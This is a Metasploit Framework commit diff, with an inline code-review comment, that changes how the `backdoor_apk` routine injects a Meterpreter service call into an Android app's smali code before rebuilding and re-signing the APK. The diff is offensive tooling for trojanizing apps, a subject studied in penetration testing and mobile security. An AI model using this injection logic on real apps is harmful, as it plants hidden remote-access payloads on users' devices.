
Commit 981f318

author
Brent Cook
committed
Land rapid7#7847, fix smali code injection for more APKs
2 parents f61314d + d9602f4 commit 981f318


3 files changed

+14
-10
lines changed


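--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -14,7 +14,7 @@ PATH
 metasploit-concern
 metasploit-credential
 metasploit-model
-metasploit-payloads (= 1.2.8)
+metasploit-payloads (= 1.2.9)
 metasploit_data_models
 metasploit_payloads-mettle (= 0.1.6)
 msgpack
@@ -169,7 +169,7 @@ GEM
 activemodel (~> 4.2.6)
 activesupport (~> 4.2.6)
 railties (~> 4.2.6)
-metasploit-payloads (1.2.8)
+metasploit-payloads (1.2.9)
 metasploit_data_models (2.0.13)
 activerecord (~> 4.2.6)
 activesupport (~> 4.2.6)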

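--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -198,12 +198,12 @@ def backdoor_apk(apkfile, raw_payload)
 end
 
 unless activitysmali
-raise RuntimeError, "Unable to find hook point in #{smalifiles}\n"
+raise RuntimeError, "Unable to find hookable activity in #{smalifiles}\n"
 end
 
-entrypoint = ';->onCreate(Landroid/os/Bundle;)V'
+entrypoint = 'return-void'
 unless activitysmali.include? entrypoint
-raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n"
+raise RuntimeError, "Unable to find hookable function in #{smalifile}\n"
 end
 
 # Remove unused files
@@ -226,10 +226,10 @@ def backdoor_apk(apkfile, raw_payload)
 File.open(newfilename, "wb") {|file| file.puts newsmali }
 end
 
-payloadhook = entrypoint + %Q^
-invoke-static {p0}, L#{package_slash}/MainService;->startService(Landroid/content/Context;)V
-^
-hookedsmali = activitysmali.gsub(entrypoint, payloadhook)
+payloadhook = %Q^invoke-static {}, L#{package_slash}/MainService;->start()V
+
+^ + entrypoint
+hookedsmali = activitysmali.sub(entrypoint, payloadhook)
 
 print_status "Loading #{smalifile} and injecting payload..\n"
 File.open(smalifile, "wb") {|file| file.puts hookedsmali }
@@ -241,6 +241,10 @@ def backdoor_apk(apkfile, raw_payload)
 
 print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
 run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
+unless File.readable?(injected_apk)
+raise RuntimeError, "Unable to rebuild apk with apktool"
+end
+
 print_status "Signing #{injected_apk}\n"
 run_cmd("jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore #{keystore} -storepass #{storepass} -keypass #{keypass} #{injected_apk} #{keyalias}")
 print_status "Aligning #{injected_apk}\n"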
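Review bot: `hookedsmali = activitysmali.sub(entrypoint, payloadhook)` at new line 232 passes the generated smali as a replacement string, and `String#sub` interprets `\\`, `\&` and `\0`-style sequences in that argument, so any backslash that ever reached `package_slash` would silently corrupt the emitted instruction; the block form `hookedsmali = activitysmali.sub(entrypoint) { payloadhook }` inserts it literally. The switch from the `onCreate` signature to the bare `return-void` substring also means the guard at line 205 accepts a match anywhere in the file, so the "Unable to find hookable function" error is harder to hit than its message suggests and the insertion point is whichever method baksmali listed first; that is presumably the intended heuristic, and a comment stating it would help the next reader, e.g. `# Hook the first return-void in the activity's smali; which method that is depends on the order baksmali emitted them`. `backdoor_apk` starts and ends outside the hunk.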

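--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
 # are needed when there's no database
 spec.add_runtime_dependency 'metasploit-model'
 # Needed for Meterpreter
-spec.add_runtime_dependency 'metasploit-payloads', '1.2.8'
+spec.add_runtime_dependency 'metasploit-payloads', '1.2.9'
 # Needed for the next-generation POSIX Meterpreter
 spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.6'
 # Needed by msfgui and other rpc components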
